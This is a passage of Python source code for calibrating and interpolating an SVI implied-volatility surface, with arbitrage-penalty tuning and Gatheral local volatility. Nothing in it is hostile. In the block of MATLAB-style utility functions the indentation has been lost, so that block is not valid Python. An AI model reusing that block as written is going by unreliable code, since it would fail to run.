        is given) scales the calendar-spread constraint.
    param_slice_before : SVI parameters of the previous maturity slice; when
        given, an unconstrained fit is run first and used as starting point.

    Returns the parameter vector with the smallest objective value found.
    """
    #############################################################################
    # Optimisation Function : min Loss function = ( SVI_model - Variance_Market )
    # We can use these bunded opt function : trust-constr , SLSQP, COBYLA
    #############################################################################
    #=========== SVI Parameters Boundaries ======================================
    a_low = 1e-6
    a_high = np.max(mkt_tot_variance)
    b_low = 0.001
    b_high = 1
    rho_low = -0.999999
    rho_high = 0.999999
    m_low = 2*np.min(log_moneyness)
    m_high = 2*np.max(log_moneyness)
    sigma_low = 0.001
    sigma_high = 2
    #=========== SVI Parameters Initial Guess =====================================
    a_init = np.min(mkt_tot_variance)/2
    b_init = 0.1
    rho_init = -0.5
    m_init = 0.1
    sig_init = 0.1
    SVI_param_bounds = ((a_low,a_high),(b_low, b_high),(rho_low,rho_high),(m_low,m_high),(sigma_low,sigma_high))
    theta_init = initialGuess
    if initialGuess is None :
        theta_init = np.array([a_init, b_init, rho_init, m_init, sig_init])
    if param_slice_before is not None :
        # Warm start: recurse once WITHOUT the calendar constraint so the
        # constrained solve below starts from a sensible point.
        theta_init = fit_svi(mkt_tot_variance=mkt_tot_variance,
                             maturity=maturity,
                             log_moneyness=log_moneyness,
                             initialGuess=initialGuess,
                             S0=S0,
                             lambdaList = lambdaList,
                             param_slice_before = None)
    #Constraint Function : g(k) > 0
    cons1 = {'type': 'ineq', 'fun': lambda x : lambdaList[0] * constraint1(x , log_moneyness )}
    cons2 = {'type': 'ineq', 'fun': lambda x : lambdaList[1] * constraint2(x , log_moneyness )}
    cons3 = {'type': 'ineq', 'fun': lambda x : lambdaList[2] * constraint3(x , log_moneyness )}
    cons4 = {'type': 'ineq', 'fun': lambda x : lambdaList[3] * constraint4(x , log_moneyness )}
    # Fixed log-moneyness grid on which the calendar constraint is penalized.
    gridPenalization = np.linspace(np.log(0.3),
                                   np.log(3.0),
                                   num=200)
    constraintList = [cons1,cons2,cons3,cons4]
    if param_slice_before is not None :
        def calendarConstraint(theta, mkt_log_mon, param_slice_before):
            # Negative when the current slice dips below the previous slice
            # (calendar arbitrage); zero when w_t >= w_{t-1} + epsilon.
            sliceBefore = SVI_two_arguments(param_slice_before, mkt_log_mon)
            sliceCurrent = SVI_two_arguments(theta, mkt_log_mon)
            epsilon = 1e-3
            #return - np.sqrt(np.mean(np.square(np.clip(sliceBefore - sliceCurrent + epsilon, 0.0, None))))
            return - np.mean(np.abs(np.clip(sliceBefore - sliceCurrent + epsilon, 0.0, None)))
        cons5 = {'type': 'ineq', 'fun': lambda x : lambdaList[4] * calendarConstraint(x, gridPenalization, param_slice_before)}
        constraintList.append(cons5)
    #constraintList = []
    # NOTE(review): multi-start is disabled (nbTry = 1), so the loop runs a
    # single SLSQP solve from theta_init; the commented code documents the
    # intended random-restart extension.
    nbTry = 1#20
    parameters = np.zeros((size(theta_init), nbTry))
    funValue = np.zeros((nbTry, 1))
    for i in range(nbTry):
        #param0 = generateRandomStartValues(lb=np.array(list(map(lambda x : x[0], SVI_param_bounds))),
        #                                   ub=np.array(list(map(lambda x : x[1], SVI_param_bounds))))
        #param0 = generateAdmissibleRandomStartValues(lb=np.array(list(map(lambda x : x[0], SVI_param_bounds))),
        #                                             ub=np.array(list(map(lambda x : x[1], SVI_param_bounds))),
        #                                             constraintList=constraintList)
        result = minimize(lambda x : fct_least_squares(x, log_moneyness, mkt_tot_variance),
                          theta_init,
                          method='SLSQP',
                          bounds=SVI_param_bounds,
                          constraints=constraintList,
                          options={'ftol': 1e-9, 'disp': True})
        parameters[:, i] = result.x
        funValue[i,0] = result.fun
    idMin = idxmin(funValue)
    # Optimal SVI vector : a*, b*, rho*, m*, sigma*
    a_star, b_star, rho_star, m_star, sig_star = parameters[:, idMin[0]]
    # NOTE(review): total_variances_fit is computed but never used/returned.
    total_variances_fit = SVI(log_moneyness, a_star, b_star, rho_star, m_star, sig_star)
    return parameters[:, idMin[0]]
##################################################################################### Black-scholes
def blsprice(close,
             strike,
             bootstrap,
             tau_interp,
             implied_volatility,
             optionType) :
    """MATLAB-blsprice shim: Black-Scholes price using the bootstrapped
    discount and dividend curves averaged over [0, tau_interp].

    optionType is forwarded to BS.bs_price as the call/put flag.
    """
    cp = optionType
    return BS.bs_price(cp, close, strike,
                       bootstrap.discountIntegral(tau_interp)/tau_interp,
                       tau_interp, implied_volatility,
                       bootstrap.dividendIntegral(tau_interp)/tau_interp)

def blsimpv(close,
            K_t,
            bootstrap,
            tau_interp,
            optionPrice,
            optionType):
    """MATLAB-blsimpv shim: implied volatilities for a strip of strikes K_t
    at the single maturity tau_interp (broadcast via np.ones_like)."""
    maturities = tau_interp * np.ones_like(K_t)
    return BS.vectorizedImpliedVolatilityCalibration(close, bootstrap, maturities,
                                                     K_t, optionType, optionPrice)
##################################################################################### Utilities
def isempty(l):
return ((l is None) or (numel(l)==0))
def norm(x):
return np.sqrt(np.sum(np.square(x)))
def error(message):
raise Exception(message)
return
def _assert(predicate, message):
assert predicate, message
return
def ismember(elt, l):
return np.isin(elt, l)
def sqrt(x):
return np.sqrt(x)
def sign(x):
return np.sign(x)
def numel(l):
if type(l)==np.float :
return 1
return len(l) if (type(l)==type([]) or type(l)==type(())) else l.size
def ones(shape):
return np.ones(shape)
def size(array, dim = None):
return numel(array) if (dim is None) else array.shape[dim]
def isequal(*args):
return (len(set(args)) <= 1)
def exp(x):
    """Elementwise exponential (MATLAB-style alias for np.exp)."""
    result = np.exp(x)
    return result
def unique(x):
    """Sorted unique values of x (MATLAB-style alias for np.unique)."""
    distinct = np.unique(x)
    return distinct
def zeros(x):
    """Array of zeros with the given shape (MATLAB-style alias)."""
    filled = np.zeros(x)
    return filled
def idxmin(x):
    """Multi-dimensional index (tuple) of the smallest entry of array x."""
    flat_position = np.argmin(x)
    return np.unravel_index(flat_position, x.shape)
def unsortedUniquePairs(a):
    """Drop pairs whose first component duplicates an earlier one, keeping
    first occurrences in their original order."""
    firsts = np.ravel([pair[0] for pair in a])
    _, first_positions = np.unique(firsts, return_index=True)
    keep = np.sort(first_positions)
    return [a[pos] for pos in keep]
def interp1(x, v, xq, method, extrapolationMethod):
    """1-D interpolation of samples (x, v) evaluated at xq.

    method == "linear" builds a linear interpolant that always extrapolates;
    any other method falls back to a monotone PCHIP spline on de-duplicated,
    sorted abscissae, extrapolating only when extrapolationMethod is
    "extrapolate".
    """
    xs = np.ravel(x)
    vs = np.ravel(v)
    if method == "linear":
        interpolant = scipy.interpolate.interp1d(xs, vs, kind=method,
                                                 fill_value="extrapolate")
    else:
        # PCHIP requires strictly increasing x: sort, then drop duplicates.
        dedup = unsortedUniquePairs(sorted(zip(xs, vs)))
        interpolant = scipy.interpolate.PchipInterpolator(
            np.ravel([p[0] for p in dedup]),
            np.ravel([p[1] for p in dedup]),
            extrapolate=(extrapolationMethod == "extrapolate"))
    return interpolant(xq)
##################################################################################### Converting SVI parametrization
def svi_convertparameters(param_old=None, _from=None, to=None, tau=None):
    #svi_convertparameters converts the parameter set of one type of SVI
    #formulation to another. The parameterizations are assumed to be:
    # * raw = (a, b, rho, m, sigma)   <- ordering actually used by the code
    # * natural = (delta, mu, rho, omega, zeta)
    # * jumpwing = (v, psi, p, c, vt)
    #
    # Input:
    # * param_old = (5x1) = original parameters
    # * _from = string = formulation of original parameters (raw, natural,
    # jumpwing)
    # * to = string = formulation of new parameters (raw, natural, jumpwing)
    # * tau = scalar = time to maturity; required only when converting to or
    #   from the jumpwing formulation (those parameters are maturity-scaled)
    #
    # Output:
    # param_new = (5x1) = new parameters
    # test that input is correct
    _assert(numel(param_old) == 5, ('There have to be five original parameters'))
    if not ((_from == 'raw') or (_from == 'natural') or (_from == 'jumpwing')):
        error('from has to be one of: raw, natural, jumpwing')
    if not ((to == 'raw') or (to == 'natural') or (to == 'jumpwing')):
        # NOTE(review): message says 'from' but this branch validates 'to'.
        error('from has to be one of: raw, natural, jumpwing')
    if ((to == 'jumpwing') or (_from == 'jumpwing')) and (tau is None):
        error('tau is required for tailwings formulation')
    # Emulated MATLAB switch on the source parameterization.
    __switch_0__ = _from
    if __switch_0__ == 'raw':
        a = param_old[0]
        b = param_old[1]
        m = param_old[3]
        rho = param_old[2]
        sigma = param_old[4]
        __switch_1__ = to
        if __switch_1__ == 'raw':
            param_new = param_old
        elif __switch_1__ == 'natural':
            # Gatheral & Jacquier raw -> natural closed-form mapping.
            omega = 2 * b * sigma / sqrt(1 - rho ** 2)
            delta = a - omega / 2 * (1 - rho ** 2)
            mu = m + rho * sigma / sqrt(1 - rho ** 2)
            zeta = sqrt(1 - rho ** 2) / sigma
            param_new = [delta, mu, rho, omega, zeta]
        elif __switch_1__ == 'jumpwing':
            # w = ATM total implied variance of the raw slice.
            w = a + b * (-rho * m + sqrt(m ** 2 + sigma ** 2))
            v = w / tau
            psi = 1 / np.sqrt(w) * b / 2 * (-m / sqrt(m ** 2 + sigma ** 2) + rho)
            p = 1 / np.sqrt(w) * b * (1 - rho)
            c = 1 / np.sqrt(w) * b * (1 + rho)
            vt = 1 / tau * (a + b * sigma * sqrt(1 - rho ** 2))
            param_new = [v, psi, p, c, vt]
    elif __switch_0__ == 'natural':
        __switch_1__ = to
        if __switch_1__ == 'raw':
            delta = param_old[0]
            mu = param_old[1]
            rho = param_old[2]
            omega = param_old[3]
            zeta = param_old[4]
            a = delta + omega / 2 * (1 - rho ** 2)
            b = omega * zeta / 2
            m = mu - rho / zeta
            sigma = np.sqrt(1 - rho ** 2) / zeta
            param_new = [a, b, rho, m, sigma]
        elif __switch_1__ == 'natural':
            param_new = param_old
        elif __switch_1__ == 'jumpwing':
            # No direct natural -> jumpwing formula: route through raw.
            param_temp = svi_convertparameters(param_old, 'natural', 'raw', tau)
            param_new = svi_convertparameters(param_temp, 'raw', 'jumpwing', tau)
    elif __switch_0__ == 'jumpwing':
        __switch_1__ = to
        if __switch_1__ == 'raw':
            v = param_old[0]
            psi = param_old[1]
            p = param_old[2]
            c = param_old[3]
            vt = param_old[4]
            w = v * tau
            b = np.sqrt(w) / 2 * (c + p)
            rho = 1 - p * np.sqrt(w) / b
            beta = rho - 2 * psi * np.sqrt(w) / b
            alpha = np.sign(beta) * np.sqrt(1 / beta ** 2 - 1)
            m = ((v - vt) * tau /
                 (b * (-rho + np.sign(alpha) * np.sqrt(1 + alpha ** 2) - alpha * np.sqrt(1 - rho ** 2))))
            if m == 0:
                # Degenerate case: solve for sigma directly from vt.
                sigma = (vt * tau - w) / b / (sqrt(1 - rho ** 2) - 1)
            else:
                sigma = alpha * m
            a = vt * tau - b * sigma * np.sqrt(1 - rho ** 2)
            # Clamp: sigma must be non-negative for a valid raw slice.
            if sigma < 0:
                sigma = 0
            param_new = [a, b, rho, m, sigma]
        elif __switch_1__ == 'natural':
            # No direct jumpwing -> natural formula: route through raw.
            param_temp = svi_convertparameters(param_old, 'jumpwing', 'raw', tau)
            param_new = svi_convertparameters(param_temp, 'raw', 'natural', tau)
        elif __switch_1__ == 'jumpwing':
            param_new = param_old
    return param_new
#######################################################################################
def fit_svi_surface(implied_volatility=None,
                    maturity=None,
                    log_moneyness=None,
                    phifun=None,
                    S0=None,
                    lambdaList=None):
    #fit_svi_surface calibrates the SVI surface to market data. First, the entire Surface SVI is fitted
    #to all log-moneyness-theta observations. Second, each slice is fitted again using the SSVI fit as
    #initial guess.
    #
    # Input:
    # * impliedvolatility, maturity, moneyness, phi
    # Output:
    # * parameters = (5xT) = parameters of SSVI = [a, b, rho, m, sigma]
    # * maturities = (Tx1) = corresponding time to maturity
    # * S0 = () = underlying value
    # NOTE(review): phifun is accepted but never used below; the code fits
    # each slice independently via fit_svi (defined elsewhere in this file)
    # rather than a global SSVI -- TODO confirm against the docstring above.
    # step one: estimate total implied variance
    total_implied_variance = np.multiply(np.square(implied_volatility), maturity)
    # step two: use linear interpolation for ATM total implied variance
    maturities = np.sort(np.unique(maturity))
    T = size(maturities)
    theta = np.zeros(T)#np.zeros((T, 1))
    for t in np.arange(T):
        pos = (maturity == maturities[t]) #position corresponding to a slice i.e. a smile
        tiv_t = total_implied_variance[pos]
        if np.isin(0, log_moneyness[pos]):
            theta[t] = tiv_t[log_moneyness[pos] == 0] #ATM total implied variance
        else:#Interpolate ATM total implied variance from the smile
            # max(.) with the previous theta enforces non-decreasing ATM
            # total variance in maturity (no calendar arbitrage at the money).
            theta[t] = max(interp1(log_moneyness[pos], tiv_t, 0, 'linear', 'extrapolate'), theta[t-1] if t > 0 else 0)
    # step three: fit SVI surface by estimating parameters = [rho, lambda] subject to parameter bounds:
    # -1 < rho < 1, 0 < lambda
    # and constraints: in heston_like: (1 + |rho|) <= 4 lambda, in power-law: eta(1+|rho|) <= 2
    # NOTE(review): v is computed but unused below.
    v = np.divide(theta, maturities)
    #print()
    # step five: iterate through each maturity and fit c and vt for best fit
    parameters = np.zeros((5, T))
    for t in np.arange(T):#[::-1]:
        pos = (maturity == maturities[t]) #position for the slice
        log_moneyness_t = log_moneyness[pos]
        total_implied_variance_t = total_implied_variance[pos] #smile
        print("time step", t, " : ", maturities[t])
        if t == 0:
            # First slice: no earlier fit available as warm start.
            parameters[:, t] = fit_svi(mkt_tot_variance=total_implied_variance_t,
                                       maturity=maturities[t],
                                       log_moneyness=log_moneyness_t,
                                       initialGuess=None,
                                       S0=S0,
                                       lambdaList = lambdaList,
                                       param_slice_before = None)
        else:
            # Later slices: warm-start from the previous maturity's fit.
            parameters[:, t] = fit_svi(mkt_tot_variance=total_implied_variance_t,
                                       maturity=maturities[t],
                                       log_moneyness=log_moneyness_t,
                                       initialGuess=parameters[:, t-1],
                                       S0=S0,
                                       lambdaList = lambdaList,
                                       param_slice_before = None)#parameters[:, t-1])
        # Refresh theta with the fitted slice's ATM total variance.
        theta[t] = SVI_two_arguments(parameters[:, t], 0.0)
    return parameters, theta, maturities
##################################################################################### Interpolating different SVI smiles
def svi_interpolation(log_moneyness=None,
                      tau_interp=None,
                      forward_interp=None,
                      interest_interp=None,
                      parameters=None,
                      theta=None,
                      maturities=None,
                      forward_theta=None,
                      interest_rate_theta=None,
                      S0=None,
                      bootstrap=None ,
                      optionType = None):
    #svi_interpolation estimates inter/extrapolated SVI
    #
    #Input:
    # * log_moneyness = (Kx1) = log-moneyness at which to evalute volatility slices
    # * tau_interp = scalar = maturity at which to generate volatility slices
    # * forward_interp = scalar = forward prices corresponding to maturities
    # * interest_interp = scalar = interest rates corresponding to maturities
    # * parameters (5xL) = estimated parameters of SVI in jumpwing parameterization
    # * theta (Lx1) = ATM total variance time at which the parameters were estimated
    # * maturities (Lx1) = time to maturity corresponding to theta
    # * forward_theta = (Lx1) = forward prices corresponding to theta
    # * interest_rate_theta = (Lx1) = interest rates corresponding to theta (can be scalar)
    # * S0 = () = underlying value
    # * bootstrap = class = provided srvices for discoounting and dividend
    #
    #Output:
    # * total_implied_variance (Kx1) = total_implied_variances for each log_moneyness and tau_interp
    # * implied_volatility (Kx1) = implied volatilities corresponding to total_implied_variance
    # * call_price (Kx1) = call option prices correspongin to total_implied_variance
    #ensure column vectors
    log_moneyness = log_moneyness.flatten()
    theta = theta.flatten()
    maturities = maturities.flatten()
    forward_theta = forward_theta.flatten()
    interest_rate_theta = interest_rate_theta.flatten()
    #ensure scalar input
    # FIX: np.float was removed in NumPy 1.24 (it was an alias of the builtin
    # float), so the original type(x)==np.float checks would raise
    # AttributeError.  isinstance(x, float) is equivalent and also accepts
    # np.float64, which subclasses float.
    _assert(isinstance(tau_interp, float), ('tau_interp has to be scalar'))
    _assert(isinstance(forward_interp, float), ('forward_interp has to be scalar'))
    _assert(isinstance(interest_interp, float), ('interest_interp has to be scalar'))
    #expand scalar input
    if numel(interest_rate_theta) == 1:
        interest_rate_theta = interest_rate_theta * ones(size(theta))
    # ensure correct size of input
    _assert(size(parameters, 1) == size(theta, 0), ('parameter set for each theta required'))
    _assert(isequal(size(theta), size(forward_theta), size(interest_rate_theta)),
            ('theta, forward_theta, and interestrate_theta have to have the same size'))
    # estimate theta for interpolated maturity
    theta_interp = interp1(maturities, theta, tau_interp, 'linear', 'extrapolate')
    close = S0#np.multiply(forward_interp, exp(-interest_interp * tau_interp))
    # convert every calibrated raw slice to jumpwing for parameter blending
    paramJumpwing = np.zeros_like(parameters)
    for i in range(parameters.shape[1]) :
        paramJumpwing[:,i] = svi_convertparameters(parameters[:,i], 'raw', 'jumpwing', maturities[i])
    if ismember(tau_interp, maturities):
        # exact calibrated maturity: evaluate the stored slice directly
        indexMaturity = np.argwhere(maturities == tau_interp)[0][0]
        total_implied_variance = SVI_two_arguments(parameters[:, indexMaturity], log_moneyness)
        implied_volatility = sqrt(total_implied_variance / tau_interp)
        strike = forward_interp * exp(log_moneyness)
        optionPrice = np.array(blsprice(close, strike,
                                        bootstrap,
                                        tau_interp,
                                        implied_volatility,
                                        optionType))
    else:
        if min(maturities) < tau_interp and tau_interp < max(maturities):
            # interpolation
            idx = idxmin(abs(tau_interp - maturities))[0]
            # if closest maturity is smaller than tau_interp, make idx one unit larger --> idx is index of
            # smallest maturity larger than tau_interp
            if maturities[idx] < tau_interp:
                idx = idx + 1
            epsilon = 1e-6
            thetaBefore = SVI_two_arguments(parameters[:, idx - 1], 0.0)
            thetaAfter = SVI_two_arguments(parameters[:, idx], 0.0)
            # blend in sqrt(theta) when slices are distinct, otherwise in time
            if abs(thetaAfter - thetaBefore) > epsilon :
                alpha_t = ((sqrt(thetaAfter) - sqrt(theta_interp)) / (sqrt(thetaAfter) - sqrt(thetaBefore)))
            else :
                alpha_t = ((maturities[idx] - tau_interp) / (maturities[idx]- maturities[idx-1]))
            param_interp = alpha_t * paramJumpwing[:, idx - 1] + (1 - alpha_t) * paramJumpwing[:, idx]
            param_interp = svi_convertparameters(param_interp, 'jumpwing', 'raw', tau_interp)
            total_implied_variance = SVI_two_arguments(param_interp, log_moneyness)
            implied_volatility = sqrt(total_implied_variance / tau_interp)
            strike = forward_interp * exp(log_moneyness)
            optionPrice = np.array(blsprice(close, strike,
                                            bootstrap,
                                            tau_interp,
                                            implied_volatility,
                                            optionType))
        elif tau_interp < min(maturities):
            # extrapolation for small maturities: blend intrinsic value at
            # tau=0 with the first calibrated slice, in normalized price space
            forward_0 = interp1(maturities, forward_theta, 0.0, 'linear', 'extrapolate')
            strike_1 = forward_0 * exp(log_moneyness)
            isCall = np.where(optionType==1, True, False)
            optionPrice_1 = np.where(isCall,
                                     np.maximum(close - strike_1, 0.0),
                                     np.maximum(strike_1 - close, 0.0))
            idx = 0
            total_implied_variance_2 = SVI_two_arguments(parameters[:, idx], log_moneyness)
            implied_volatility_2 = sqrt(total_implied_variance_2 / maturities[idx])
            strike_2 = forward_theta[idx] * exp(log_moneyness)
            optionPrice_2 = np.array(blsprice(close, strike_2,
                                              bootstrap,
                                              maturities[idx],
                                              implied_volatility_2,
                                              optionType))
            thetaAfter = SVI_two_arguments(parameters[:, idx], 0.0)
            alpha_t = (sqrt(thetaAfter) - sqrt(theta_interp)) / sqrt(thetaAfter)
            K_t = forward_interp * exp(log_moneyness)
            optionPrice = np.multiply(K_t,
                                      ( np.divide(alpha_t * optionPrice_1, strike_1) + np.divide((1 - alpha_t) * optionPrice_2, strike_2) ))
            implied_volatility = blsimpv(close, K_t, bootstrap, tau_interp, optionPrice, optionType)
            total_implied_variance = np.power(implied_volatility, 2) * tau_interp
            if any((total_implied_variance - total_implied_variance_2) >= 0) : #Arbitrage are caused by
                # fall back to jumpwing-parameter extrapolation in theta
                param_slope = (paramJumpwing[:, idx + 1] - paramJumpwing[:, idx]) / (theta[idx + 1] - theta[idx])
                param_interp = paramJumpwing[:, idx] + (theta_interp - theta[idx]) * param_slope
                param_interp = svi_convertparameters(param_interp, 'jumpwing', 'raw', tau_interp)
                total_implied_variance = SVI_two_arguments(param_interp, log_moneyness)
                implied_volatility = sqrt(total_implied_variance / tau_interp)
                strike = forward_interp * exp(log_moneyness)
                optionPrice = np.array(blsprice(close, strike,
                                                bootstrap,
                                                tau_interp,
                                                implied_volatility,
                                                optionType))
        else:
            # extrapolation for large maturities: shift the last slice by the
            # ATM total-variance increment
            total_implied_variance = SVI_two_arguments(parameters[:, -1], log_moneyness)
            total_implied_variance = total_implied_variance + theta_interp - theta[-1]
            implied_volatility = sqrt(total_implied_variance / tau_interp)
            strike = forward_interp * exp(log_moneyness)
            optionPrice = np.array(blsprice(close, strike,
                                            bootstrap,
                                            tau_interp,
                                            implied_volatility,
                                            optionType))
    return optionPrice, implied_volatility, total_implied_variance
##################################################################################### Main functions
def interpolateGrid(df,
                    parameters,
                    theta,
                    maturities,
                    interestrate_theta,
                    forward_theta,
                    S0,
                    bootstrap):
    """Evaluate the calibrated SVI surface on every (strike, maturity) row of df.

    Groups df by maturity, inter/extrapolates each smile with
    svi_interpolation, and returns the implied volatilities as a Series
    indexed by the (Strike, Maturity) MultiIndex, sorted.
    """
    smile_vols = []  # one Series of implied vols per maturity slice
    # rename avoids the ambiguity between the "Maturity" column and the
    # "Maturity" index level when grouping
    for maturity, smile_df in df.rename({"Maturity" : "MaturityColumn"}, axis=1).groupby("MaturityColumn"):
        tau_interp = maturity
        k = smile_df["logMoneyness"].values
        forward_interp = interp1(maturities,
                                 forward_theta,
                                 tau_interp,
                                 'linear',
                                 "extrapolate")
        interest_interp = bootstrap.discountShortRate(tau_interp)
        optionType = smile_df["OptionType"].values
        call_price, implied_volatility, total_implied_variance = svi_interpolation(k,
                                                                                   tau_interp,
                                                                                   float(forward_interp),
                                                                                   float(interest_interp),
                                                                                   parameters,
                                                                                   theta,
                                                                                   maturities,
                                                                                   forward_theta,
                                                                                   interestrate_theta,
                                                                                   S0,
                                                                                   bootstrap,
                                                                                   optionType)
        smile_vols.append(pd.Series(implied_volatility, index=smile_df.index))
    if not smile_vols:
        # empty input: nothing to concatenate
        return pd.Series(dtype=float)
    # Series.append was removed in pandas 2.0 -- concatenate the slices instead.
    impliedVolInterpolated = pd.concat(smile_vols)
    index = pd.MultiIndex.from_tuples(impliedVolInterpolated.index.tolist(),
                                      names=["Strike", "Maturity"])
    return pd.Series(impliedVolInterpolated.values, index=index).sort_index()
def impliedVariance(impVol, mat=None):
    """Total implied variance sigma^2 * T from implied volatilities.

    When mat is None, maturities are read off the "Maturity" level of the
    Series' MultiIndex; otherwise the supplied maturities are used.
    """
    if mat is None:
        Ts = impVol.index.get_level_values("Maturity")
    else:
        Ts = mat
    return np.square(impVol) * Ts
##################################################################################### Local volatility
def finiteDifferenceSVI(xSet, sviEvalModel):
    # Central finite differences of total implied variance w(x, T) in
    # log-moneyness (x) and maturity (T), feeding Gatheral's local-volatility
    # formula.  Returns (dT, hk, dK, locVolGatheral, numerator) as Series
    # aligned on xSet.index.
    strikeStep = 0.0001
    maturityStep = 0.0001
    moneynesses = np.exp(xSet.logMoneyness)
    # NOTE(review): the next line immediately rebinds BOTH names to the raw
    # log-moneyness, discarding np.exp above -- looks unintentional (the rest
    # of the function only needs x = log-moneyness); TODO confirm.
    x = moneynesses = xSet.logMoneyness
    maturities = xSet.Maturity
    xSetShifted = xSet.copy(deep=True)
    # bump log-moneyness up/down for the second strike derivative
    xSetShifted["logMoneyness"] = xSetShifted["logMoneyness"] + strikeStep
    gridStrikeUp = impliedVariance(sviEvalModel(xSetShifted))
    xSetShifted["logMoneyness"] = xSetShifted["logMoneyness"] - 2 * strikeStep
    gridStrikeLow = impliedVariance(sviEvalModel(xSetShifted))
    gridStrikeMid = impliedVariance(sviEvalModel(xSet))
    # hk = d^2 w / dx^2, dK = d w / dx (central differences)
    hk = pd.Series((gridStrikeUp + gridStrikeLow - 2 * gridStrikeMid) / (strikeStep**2),
                   index = xSet.index)
    dK = pd.Series((gridStrikeUp - gridStrikeLow ) / (2 * strikeStep),
                   index = xSet.index)
    # restore log-moneyness, then bump maturity for the theta derivative
    xSetShifted["logMoneyness"] = xSetShifted["logMoneyness"] + strikeStep
    xSetShifted["Maturity"] = xSetShifted["Maturity"] + maturityStep
    gridMaturityUp = impliedVariance(sviEvalModel(xSetShifted), mat = xSetShifted["Maturity"].values)
    xSetShifted["Maturity"] = xSetShifted["Maturity"] - 2 * maturityStep
    gridMaturityLow = impliedVariance(sviEvalModel(xSetShifted), mat = xSetShifted["Maturity"].values)
    dT = pd.Series((gridMaturityUp - gridMaturityLow) / (2 * maturityStep),
                   index = xSet.index)
    # Gatheral's denominator g(x); local variance = dT / g
    numerator = (1 - np.divide(x, gridStrikeMid) * dK +
                 0.25 * ( -0.25 - np.divide(1, gridStrikeMid) +
                          np.square(np.divide(x, gridStrikeMid.values)) ) * np.square(dK) +
                 0.5 * hk )
    locVolGatheral = np.sqrt(dT / numerator)
    return dT, hk, dK, locVolGatheral, numerator
def removeMaturityInvalidData(df):
    """Drop maturities whose smile has fewer than two distinct log-moneyness
    points (a single quote cannot constrain an SVI slice)."""
    keep = []
    for mat in df["Maturity"].unique():
        smile = df[df["Maturity"] == mat]
        if smile["logMoneyness"].unique().shape[0] > 1:
            keep.append(mat)
    return df[df["Maturity"].isin(keep)]
########################################################################################## Main Class
class SSVIModelUnconstrained:
    """Slice-by-slice SVI volatility-surface model.

    fit() calibrates one raw-SVI parameter set per maturity (via
    fit_svi_surface); eval() interpolates the calibrated surface onto the
    (Strike, Maturity) grid of a dataframe.  Arbitrage constraints are
    handled through penalties (lambdaList) rather than hard constraints.
    """
    def __init__(self, S0, bootstrap):
        #Hyperparameters
        self.phi = "power_law"
        self.bootstrap = bootstrap
        self.S0 = S0
        self.tau_interp = 30 / 365.25
        self.interpMethod = 'linear'
        self.extrapolationMethod = "extrapolate"
        #Fitting results
        self.parameters = None
        self.theta = None
        self.maturities = None
        self.interestrate_theta = None
        self.forward_theta = None
        # penalty weights forwarded to the slice fitter
        self.lambdaList = [1.0, 1.0, 1.0, 1.0, 1.0]
    def fit(self, df):
        """Calibrate the SVI slices from a (Strike, Maturity)-indexed dataframe.

        Assumes df carries columns impliedVolColumn, "Maturity",
        "logMoneyness" and "Strike", with a "Maturity" index level
        (required by the groupby below) -- TODO confirm against callers.
        """
        start = time.time()
        filteredDf = removeMaturityInvalidData(df)
        self.parameters, self.theta, self.maturities = fit_svi_surface(filteredDf[impliedVolColumn].values,
                                                                       filteredDf["Maturity"].values,
                                                                       filteredDf["logMoneyness"].values,
                                                                       self.phi,
                                                                       S0 = self.S0,
                                                                       lambdaList = self.lambdaList)
        #dataSet = dataSet.copy()
        # recover forwards from log-moneyness: F = K * exp(-k)
        forward = np.exp(-filteredDf["logMoneyness"]) * filteredDf["Strike"]
        # round for float comparaison
        self.forward_theta = forward.groupby("Maturity").mean().values
        self.interestrate_theta = self.bootstrap.discountIntegral(self.maturities) / self.maturities
        end = time.time()
        print("Training Time : ", end - start)
        return
    def assessArbitrageViolations(self, df):
        """Count butterfly (g < 0) and calendar (crossing slices) violations
        on a fixed log-moneyness grid; returns (nbButterfly, nbCalendar).

        NOTE(review): the loop variable m is rebound by the tuple unpacking
        inside each iteration (slice index vs SVI location parameter); it
        works only because the for statement re-binds m -- fragile.
        """
        nbViolationBut = 0
        #logMoneynessGrid = df["logMoneyness"].unique()
        logMoneynessGrid = np.linspace(np.log(0.3),
                                       np.log(3.0),
                                       num=200)
        for m in range(self.parameters.shape[1]):
            a, b, rho, m, sig = self.parameters[:,m]
            g = test_convexity(logMoneynessGrid, a, b, rho, m, sig)
            nbViolationBut += np.sum(g < 0.0)
        slicePrevious = np.zeros_like(logMoneynessGrid)
        nbViolationCal = 0
        for m in range(self.parameters.shape[1]):
            a, b, rho, m, sig = self.parameters[:,m]
            sliceSVI = SVI(logMoneynessGrid, a, b, rho, m, sig)
            nbViolationCal += np.sum((slicePrevious - sliceSVI) > 0.0)
            slicePrevious = sliceSVI
        return nbViolationBut, nbViolationCal
    def automaticHyperparametersTuning(self, df):
        """Grid-search the butterfly then calendar penalty weights, refitting
        for each candidate; plots arbitrage counts / RMSE and returns them.

        Side effects: temporarily mutates self.lambdaList and refits the
        model many times (restores lambdaList at the end, but the LAST fit's
        parameters remain stored on self).
        """
        #Block print
        formerStdOut = sys.stdout
        sys.stdout = open(os.devnull, 'w')
        def multiplyList(liste, factor):
            return list(map(lambda y : factor * y, liste))
        #Iterate on a grid of values for butterfly arbitrage constraint
        formerLambdaList = self.lambdaList
        lambdaButterfly = [0.0, 1e-3, 1e-2, 1e-1, 1.0, 10.0, 1e2, 1e3, 1e4, 1e5]
        numberOfarbitrageButterfly = []
        rmseBut = []
        firstArbitrageFreeLambda = None
        for l in lambdaButterfly :
            self.lambdaList = multiplyList(formerLambdaList, l)
            self.lambdaList[4] = 0.0
            self.fit(df)
            numberOfarbitrageButterfly.append(self.assessArbitrageViolations(df)[0])
            pred = self.eval(df)
            rmseBut.append( mean_squared_error( pred, df[impliedVolColumn]))
            if (firstArbitrageFreeLambda is None) and (numberOfarbitrageButterfly[-1]==0) :
                firstArbitrageFreeLambda = l
        #Iterate on a grid of values for calendar arbitrage constraint
        lambdaCalendar = [0.0, 1e-6, 1e-5, 1e-4, 1e-3, 1e-2, 1e-1, 1.0, 10.0, 1e2, 1e3, 1e4, 1e5, 1e6, 1e7, 1e8, 1e9]
        numberOfArbitrageCalendar = []
        rmseCal = []
        for l in lambdaCalendar :
            self.lambdaList = multiplyList(formerLambdaList, l)
            # pin the butterfly-related weights at the first arbitrage-free
            # value found above (None if no candidate was arbitrage-free)
            self.lambdaList[0] = firstArbitrageFreeLambda
            self.lambdaList[1] = firstArbitrageFreeLambda
            self.lambdaList[2] = firstArbitrageFreeLambda
            self.lambdaList[3] = firstArbitrageFreeLambda
            self.fit(df)
            numberOfArbitrageCalendar.append(self.assessArbitrageViolations(df)[1])
